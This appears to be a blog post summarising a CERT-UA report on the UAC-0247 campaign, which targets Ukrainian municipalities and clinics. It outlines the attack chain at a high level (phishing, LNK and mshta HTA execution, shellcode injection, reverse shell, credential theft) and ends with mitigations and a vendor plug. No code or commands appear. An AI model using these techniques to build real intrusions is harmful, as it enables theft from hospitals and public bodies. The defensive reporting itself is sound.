A newly identified cyber campaign known as UAC-0247 has brought renewed attention to the growing risks faced by government and healthcare systems in conflict-affected regions. According to findings released by CERT-UA, this operation specifically targeted municipal authorities, clinics, and emergency healthcare providers across Ukraine with a sophisticated chain of malware designed for data theft and long-term persistence.
The campaign was observed between March and April 2026 and reflects a broader trend in modern cyber operations: combining psychological manipulation with technically advanced malware frameworks. Although the threat actor behind UAC-0247 has not been definitively identified, the complexity of the tools and techniques suggests a well-organized and resourceful adversary.
Phishing Strategy Designed for High Success Rates
The attack begins with a carefully crafted phishing email disguised as a humanitarian aid proposal. This theme is not accidental. In regions dealing with crisis conditions, such messaging increases the likelihood that recipients will open emails and interact with embedded links.
Once clicked, the link directs the victim to either a compromised legitimate website or a fake page generated using artificial intelligence tools. In scenarios involving legitimate websites, attackers exploit cross-site scripting vulnerabilities to inject malicious scripts. This approach allows them to maintain a sense of trust while delivering harmful content.
The end goal at this stage is simple: convince the user to download a malicious file disguised as something legitimate.
Execution Mechanism and Malware Deployment
After interacting with the malicious page, the victim downloads a Windows shortcut file (LNK). While seemingly harmless, this file acts as the launchpad for the attack. When executed, it triggers the Windows utility “mshta.exe,” which is used to run a remote HTML Application (HTA).
The HTA file serves as both a distraction and a delivery mechanism. It displays a decoy interface to the user while quietly downloading and executing additional malicious payloads in the background.
The payload then injects shellcode into legitimate processes such as runtimeBroker.exe. By embedding itself within trusted system processes, the malware avoids raising suspicion and bypasses many traditional detection methods.
In more advanced cases, the attackers employ a two-stage loader system. The second stage is implemented using a custom executable format capable of handling structured code execution and dynamic linking. The payload is encrypted and compressed, making reverse engineering and detection significantly more challenging.
Maintaining Access and Command Control
Once the system is compromised, the attackers establish persistence through a reverse shell known as RAVENSHELL. This tool creates a communication channel between the infected machine and the attacker’s command server, allowing remote execution of commands via standard system utilities.
Alongside this, the malware family AGINGFLY is deployed. Developed in C#, it provides extensive control over the infected system, enabling attackers to execute commands, log keystrokes, transfer files, and deploy additional malware.
A PowerShell-based component named SILENTLOOP further strengthens the attack. It retrieves command-and-control server addresses from Telegram channels and includes fallback mechanisms to maintain communication even if primary servers are disrupted.
Data Exfiltration and Network Expansion
The primary objective of UAC-0247 is data theft. Attackers focus on extracting sensitive information from Chromium-based browsers, including saved credentials, cookies, and session tokens. They also deploy tools designed to access WhatsApp Web data, enabling them to capture private conversations.
In addition to data exfiltration, the attackers perform reconnaissance and lateral movement within compromised networks. Tools used in the campaign allow for network scanning, tunneling, and expansion into additional systems.
Some instances of the attack also include cryptocurrency mining modules, suggesting that financial gain may be a secondary objective.
Detection Challenges in Modern Threats
The stealthy nature of this campaign makes it particularly difficult to detect. By using legitimate system tools and encrypting payloads, attackers can operate under the radar of traditional security solutions.
This highlights the importance of visibility and intelligence in modern cybersecurity. Platforms like IntelligenceX provide organizations with the ability to identify exposed assets, monitor malicious infrastructure, and track threat activity across multiple sources.
By leveraging IntelligenceX, security teams can gain insights into attacker behavior, detect suspicious domains, and proactively mitigate risks before they escalate.
Mitigation and Defense Strategies
To reduce exposure to such threats, organizations should restrict the execution of file types commonly used in attacks, including LNK, HTA, and JavaScript files. Limiting the use of built-in utilities like mshta.exe and PowerShell can also reduce the attack surface.
User awareness training remains critical, as phishing continues to be one of the most effective entry points for attackers.
Conclusion
The UAC-0247 campaign is a clear example of how cyber threats are evolving in both scale and sophistication. Organizations must adopt proactive security strategies, combining visibility, intelligence, and strong internal controls to defend against such advanced attacks.
Top comments (0)